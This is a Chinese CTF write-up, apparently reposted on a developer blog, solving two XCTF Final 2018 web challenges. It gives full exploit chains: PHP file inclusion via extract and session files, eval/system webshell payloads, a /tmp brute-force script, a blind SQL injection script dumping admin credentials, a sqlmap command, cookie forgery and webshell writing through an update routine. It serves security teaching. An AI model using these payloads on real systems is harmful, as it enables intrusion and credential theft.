内容简介:这道题提供index.php源码index.php从index.php可以看出
WEB1——Bestphp
这道题提供index.php源码
index.php
<?php
highlight_file(__FILE__);
error_reporting(0);
ini_set('open_basedir', '/var/www/html:/tmp');
$file = 'function.php';
$func = isset($_GET['function'])?$_GET['function']:'filters';
call_user_func($func,$_GET);
include($file);
session_start();
$_SESSION['name'] = $_POST['name'];
if($_SESSION['name']=='admin'){
header('location:admin.php');
}
?>
解题思路一
变量覆盖,调用文件包含
从index.php可以看出 $_GET['function'] 和 $_SESSION['name'] = $_POST['name'] 可控
其中 call_user_func($func,$_GET); 回调函数可利用
而且 include($file); 调用了文件包含
所以,可以调用变量覆盖函数,覆盖掉 $file ,从而引入文件包含
payload:
http://10.99.99.16/?function=extract&file=php://filter/read=convert.base64-encode/resource=./function.php
一开始只是 highlight_file 给出index.php的源码,利用文件包含读到了admin.php和function.php的源码,不过对解题没啥卵用。
function.php
<?php
function filters($data){
foreach($data as $key=>$value){
if(preg_match('/eval|assert|exec|passthru|glob|system|popen/i',$value)){
die('Do not hack me!');
}
}
}
?>
admin.php
hello admin
<?php
if(empty($_SESSION['name'])){
session_start();
#echo 'hello ' + $_SESSION['name'];
}else{
die('you must login with admin');
}
?>
吐槽点:早上题目的环境是 php 7.2,extract函数是无法动态调用的,然后中午主办方偷偷改了环境为7.0,也不发公告说一声,浪费了很多时间。
调用session_start方法,修改session位置
从index.php可以看出 $_SESSION['name'] = $_POST['name'] ,session的值可控,session默认的保存位置
/var/lib/php/sess_PHPSESSID /var/lib/php/sessions/sess_PHPSESSID /var/lib/php5/sess_PHPSESSID /var/lib/php5/sessions/sess_PHPSESSID /tmp/sess_PHPSESSID /tmp/sessions/sess_PHPSESSID
由于 ini_set('open_basedir', '/var/www/html:/tmp') ,我们包含不了 /var/lib/ 下的session
但是我在tmp下也找不到自己的session,所以这里的session应该是在 /var/lib/ 下
这里可以调用session_start函数,修改session的位置
本地的payload:
POST /xctf-bestphp/index.php?function=session_start&save_path=. HTTP/1.1 Host: 127.0.0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 21 Cookie: PHPSESSID=lfc5uk0rv8ndmjfv86u9tv6fk2 Content-Type: application/x-www-form-urlencoded name=<?php phpinfo();
这里直接把session写到了web根目录,并且内容可控
文件包含session,getshell
http://10.99.99.16/index.php?function=extract&file=./sess_lfc5uk0rv8ndmjfv86u9tv6fk2
比赛的payload
POST /index.php?function=session_start&save_path=/tmp HTTP/1.1 Host: 10.99.99.16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=a9tvfth9lfqabt9us85t3b07s1 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 41 name=<?php echo "aaa";system($_GET[x]);?>
GET /index.php?function=extract&file=/tmp/sess_a9tvfth9lfqabt9us85t3b07s1&x=cat+sdjbhudfhuahdjkasndjkasnbdfdf.php HTTP/1.1 Host: 10.99.99.16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=a9tvfth9lfqabt9us85t3b07s1 Upgrade-Insecure-Requests: 1
解题思路二
php7.0的bug
王一航师傅发过一篇文章: https://www.jianshu.com/p/dfd049924258
是php7的一个小bug
include.php?file=php://filter/string.strip_tags/resource=/etc/passwd
string.strip_tags 可以导致php7在执行过程中奔溃
如果请求中同时存在一个文件上传的请求 , 这个文件就会被因为奔溃被保存在 /tmp/phpXXXXXX (XXXXXX是数字+字母的6位数)
这个文件是持续保存的,不用竞争,直接爆破,为了爆破成功可以多线程去上传文件,生成多个phpXXXXXX
burp多线程上传文件
POST /index.php?function=extract&file=php://filter/string.strip_tags/resource=function.php HTTP/1.1 Host: 10.99.99.16 Content-Length: 1701 Cache-Control: max-age=0 Origin: null Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeScXqSzdW2v22xyk User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7 Cookie: PHPSESSID=17qpuv1r8g19pm503593nddq10 Connection: close ------WebKitFormBoundaryeScXqSzdW2v22xyk Content-Disposition: form-data; name="fileUpload"; filename="test.jpg" Content-Type: image/jpeg <?php echo "wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww";@eval($_POST['cmd']); ?> ------WebKitFormBoundaryeScXqSzdW2v22xyk--
爆破脚本
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import string
charset = string.digits + string.letters
host = "10.99.99.16"
port = 80
base_url = "http://%s:%d" % (host, port)
def brute_force_tmp_files():
for i in charset:
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
filename = i + j + k + l + m + n
url = "%s/index.php?function=extract&file=/tmp/php%s" % (
base_url, filename)
print url
try:
response = requests.get(url)
if 'wwwwwwwwwwwwww' in response.content:
print "[+] Include success!"
return True
except Exception as e:
print e
return False
def main():
brute_force_tmp_files()
if __name__ == "__main__":
main()
getshell
爆破成功后,得到成功文件包含的shell
http://10.99.99.16/index.php?function=extract&file=/tmp/phpXXXXX
WEB2——PUBG
赛题提供了源码
https://github.com/aye-whitehat/CTF-Collection/blob/master/XCTF%20Final%202018/web/PUBG/www.zip但是zend加密了,给出解密后的代码,但是变量名还是混淆的
https://github.com/aye-whitehat/CTF-Collection/blob/master/XCTF%20Final%202018/web/PUBG/DECODE.zip 环境还没关,复现记得修改下host 159.138.22.212 guaika.txmeili.com
这题在比赛的时候利用的漏洞链是:sql注入+cookie伪造+后台getshell
解题思路
sql注入
代码位于 kss_inc/payapi_return2.php
关键代码:
这里的post参数没有调用该框架的 sql 过滤器,只是进行简单的trim()处理
else if ( $_obfuscate_kYyPkY_PkJKVh4qGjJGIio4� == "e138" )
{
$_obfuscate_kpGPh4mNh46SkZONh4eLlJU� = "";
$_obfuscate_k42NkY2RkoiNjJCKlZSKiIg� = trim( $_POST['SerialNo'] );
$_obfuscate_iJWMjIiVi5OGjJOViY2Li48� = $_obfuscate_k42NkY2RkoiNjJCKlZSKiIg�;
$_obfuscate_iIuQkYaUioqGlI6IjIuMiI8� = trim( $_POST['Status'] );
$_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU� = trim( $_POST['Money'] );
$_obfuscate_lIuQk5OGjpKVjY6UiI_QjJM� = $_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU�;
$_obfuscate_iImJjYmQjYyOjIuVkIuMjIs� = trim( $_POST['VerifyString'] );
VerifyString的计算规则
else if ( $_obfuscate_kYyPkY_PkJKVh4qGjJGIio4� == "e138" )
{
$_obfuscate_k4mJh5SPkY6Vh4qHjIaJh44� = TRUE;
if ( $_obfuscate_iImJjYmQjYyOjIuVkIuMjIs� != strtolower( md5( "SerialNo=".$_obfuscate_k42NkY2RkoiNjJCKlZSKiIg�."&UserID=".$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138set']."&Money=".$_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU�."&Status=".$_obfuscate_iIuQkYaUioqGlI6IjIuMiI8�."&AttachString=e138&MerchantKey=".$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138key'] ) ) )
{
$_obfuscate_k4mJh5SPkY6Vh4qHjIaJh44� = FALSE;
}
因为设置了AttachString=e138
所以 $_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138set'] 值为1
strtolower(md5('SerialNo=1&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1'))
即为ebd95c4233e8c02fe0854306afd71bee
但其实我们只要把参数都找到就ok了,因为不会先验证VerifyString,而是先验证SerialNo和Money参数
造成sql注入的代码如下:
$_obfuscate_lZGQj4iOj4mTlZGNjZGUj5E� = $_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_iY6OkJCRkY2PjpCPk5CRkJA�( "select * from kss_tb_order where ordernum='".$_obfuscate_iJWMjIiVi5OGjJOViY2Li48�."'" );
payload:
http://guaika.txmeili.com:8888/kss_inc/payapi_return2.php
注入点在SerialNo
SerialNo=0'or(0)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee
SerialNo=1'or(1)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee
尝试注入得到admin的密码
kss_inc/db_function.php 中可以看到登陆逻辑
if ( empty( $_obfuscate_lIqUlIaMj4aNjJCRkoeJlJE� ) )
{
$_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k� = $_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_iY6OkJCRkY2PjpCPk5CRkJA�( "select * from kss_tb_manager where id=1" );
if ( $_obfuscate_lIqUlIaMj4aNjJCRkoeJlJE� != md5( $_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k�['username'].$_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k�['password'] ) )
{
_obfuscate_kYyOhouLjo2Gh4eNj4iQlIg�( "你的原始身份效验失败!" );
}
$_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['level'] = 9;
$_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['powerlist'] = "admin";
}
表名是 kss_tb_manager,字段是username和password,id是1
注入脚本 aye.py
#! coding:utf-8
import requests
import sys
if sys.getdefaultencoding() != 'utf-8':
reload(sys)
sys.setdefaultencoding('utf-8')
def main():
url="http://guaika.txmeili.com:8888/kss_inc/payapi_return2.php"
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
result=''
for i in range(1,1000):
i =str(i)
for j in chars:
j=ord(j)
#SerialNo=0'or(1)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee
payload = """0'or(ascii(substr((select(concat(username,0x3a,password))from(kss_tb_manager)where(id=1)),%s,1))=%s)#"""%(i,j)
data = {'SerialNo': payload,
'UserID' : 1,
'Money' : 100,
'Status' : 1,
'AttachString' : 'e138',
'MerchantKey' : 1,
'VerifyString' : 'ebd95c4233e8c02fe0854306afd71bee',
}
#print payload
do_whlie = True
while do_whlie:
try:
r=requests.post(url,data=data)
if r.status_code == 200:
do_whlie = False
except Exception as e:
print str(e)
#print r.text
if '订单金额不符' in r.text:
result += chr(j)
#print r.text
print result
if __name__ == "__main__":
main()
得到账号密码:
axing:8ccf03839a8c63a3a9de17fa5ac6a192
密码在somd5解密得到
axing147258
但是登陆不了。。。。赛后跟出题人交流才知道,他把管理员的密码和安全码最后一个字节改了,坑爹的是cmd5和somd5只是取了md5中间的16位进行相似匹配,允许误差
所以数据库92结尾的md5是反解不了的
这里也可以用sqlmap直接跑,就是要加上一些参数,不然跑不出来
sqlmap -r burp.txt -p SerialNo --dbms mysql --risk 3 --level 5 --string="订单金额不符" --technique B
POST /kss_inc/payapi_return2.php HTTP/1.1 Host: guaika.txmeili.com:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 123 SerialNo=0&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee
cookie伪造
代码位于kss_inc/function.php
有setcookie_function(包含禁ip的逻辑)
function _obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs� )
{
setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�, 0, "/", NULL, NULL, TRUE );
if ( BINDIP == 1 )
{
setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY._obfuscate_jZKKjpCGkZSUj4aOiIePlZI�( ) ), 0, "/", NULL, NULL, TRUE );
}
else
{
setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY ), 0, "/", NULL, NULL, TRUE );
}
return $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY;
}
位于kss_admin/index.php
调用了setcookie_function
_obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( "kss_manager", $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� );
$_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_kpSOj5KVio2Hj4uKj4_KjIY�( "update kss_tb_manager set `linecode`='".$_obfuscate_kI6PjYmLhpGMk4qGjZSHlIg�."',`lastlogintime`='"._obfuscate_jZGJkpOSkY_HiY2HjY2JlIg�( )."',`lastloginip`=".$_obfuscate_kYmJjZOIiZKJioqMkoaGiYk�." where `id`=".$_obfuscate_kY_OlYeUlIiVjo6Hio_MkpI�['id'], "notsync" ); $_obfuscate_i4mRjZCJlZCGk4_UioyHk4k�['logintype'] = 1; _obfuscate_jYuKk4uOiYmSkpOTj5GUlZA�( $_obfuscate_i4mRjZCJlZCGk4_UioyHk4k� ); $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� = $_obfuscate_kY_OlYeUlIiVjo6Hio_MkpI�['id'].",".$_obfuscate_h4eSk4uGiZCKhoyNkIiTlI8�.",".md5( $_obfuscate_jZOIiIiJkJOGiY_KjoaGh4c� ).",".$_obfuscate_kI6PjYmLhpGMk4qGjZSHlIg�; _obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( "kss_manager", $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� );
其实就是调用了
setcookie_function( "kss_manager",$id.",".$username.",".md5($password).",".$linecode"
然后执行两句setcookie,得到kss_manager和kss_manager_ver两个cookie
setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�, 0, "/", NULL, NULL, TRUE ); setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY ), 0, "/", NULL, NULL, TRUE )
并且在 kss_inc/_config.php找到$COOKKEY的值 XIpCcfoe_y43
define( "COOKKEY", "XIpCcfoe_y43" ); define( "COOKKEY2", "MGHOu2m|oXDz" );
也在 kss_inc/db_function.php
找到了$linecode的值 efefefef
if ( $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['linecode'] != $_obfuscate_h4_NjYiIi46Lh5KHkoaKkZQ�[3] && "efefefef" != $_obfuscate_h4_NjYiIi46Lh5KHkoaKkZQ�[3] && $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['username'] != "test01" )
{
_obfuscate_kYyOhouLjo2Gh4eNj4iQlIg�( "您的帐号被挤下线,<a href=index.php target=_top>请重新登陆</a>" );
}
所以最终的两个cookie的键值分别是
kss_manager
1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefef
kss_manager_ver
md5("1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefef"."XIpCcfoe_y43")
即为
md5("1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefefXIpCcfoe_y43")
即为
b05a94ffcb3da369a828235012990953
成功伪造cookie,访问 kss_admin/admin.php
浏览器替换cookie
后台getshell
代码位于 kss_admin/admin_update
这个网站的更新,是从远端主站拉取代码写入本地:
$_obfuscate_koiKkIiPjI6UkYeRlIqNhoc� = _obfuscate_lY6Gk5KMkYmPjIyPhpCOlYc�( "http://api.hphu.com/import/".$_obfuscate_koaSiYqGjIqMiZSLk4uGiZU�.".php?phpver=".PHP_VERSION."&webid=".WEBID."&rid=".time( ), 300 );
我们跟入 _obfuscate_lY6Gk5KMkYmPjIyPhpCOlYc� 函数
位于第20行,函数中有curl相关的操作
curl_setopt( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, CURLOPT_HEADERFUNCTION, "read_header" ); curl_setopt( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, CURLOPT_WRITEFUNCTION, "read_body" );
看下read_body函数
function read_body( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� )
{
global $_obfuscate_ko6MhoiQkJKRlYeVio_JjYo�;
global $_obfuscate_j4eNjZOQlIuKhoqMj4mOjYs�;
global $_obfuscate_koaSiYqGjIqMiZSLk4uGiZU�;
if ( $_obfuscate_ko6MhoiQkJKRlYeVio_JjYo� == 0 && substr( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, 0, 2 ) == "<!" )
{
$_obfuscate_j4eNjZOQlIuKhoqMj4mOjYs� = 0;
}
$_obfuscate_ko6MhoiQkJKRlYeVio_JjYo� += strlen( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� );
file_put_contents( KSSROOTDIR."kss_tool".DIRECTORY_SEPARATOR."_webup.php", $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, FILE_APPEND );
echo "<script>$('#downsize').html('".$_obfuscate_ko6MhoiQkJKRlYeVio_JjYo�."');</script>";
echo "<!-- ".str_repeat( " ", 2000 )." -->\r\n";
ob_flush( );
flush( );
return strlen( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� );
}
其中read_body函数会将curl到的内容写到 kss_tool/_webup.php
file_put_contents( KSSROOTDIR."kss_tool".DIRECTORY_SEPARATOR."_webup.php", $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, FILE_APPEND );
这里我们可以利用代码中的sql过滤器,去触发某个页面的sql报错,从而将php代码回显,从而将恶意代码写入kss_tool/_webup.php,构造webshell
例子:
构造sql报错并回显
http://api.hphu.com/test/kss_admin/index.php?action=aye666%27
构造更新路径
将报错的页面内容写入 kss_tool/_webup.php
http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action=aye666%27
触发phpinfo
http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action='<?php%2520phpinfo();?>
写shell
http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action='<?php%2520eval($_POST[aye]);echo%2520"aye666"?>
连接菜刀: http://guaika.txmeili.com:8888/kss_tool/_webup.php
getflag
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- Flutter 完整开发实战详解(十六、详解自定义布局实战)
- 数据结构 1 线性表详解 链表、 栈 、 队列 结合JAVA 详解
- 详解Openstack环境准备
- Java泛型详解
- iOS RunLoop 详解
- Raft协议详解
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Responsive Web Design
Ethan Marcotte / Happy Cog / 2011-6 / USD 18.00
From mobile browsers to netbooks and tablets, users are visiting your sites from an increasing array of devices and browsers. Are your designs ready? Learn how to think beyond the desktop and craft be......一起来看看 《Responsive Web Design》 这本书的介绍吧!
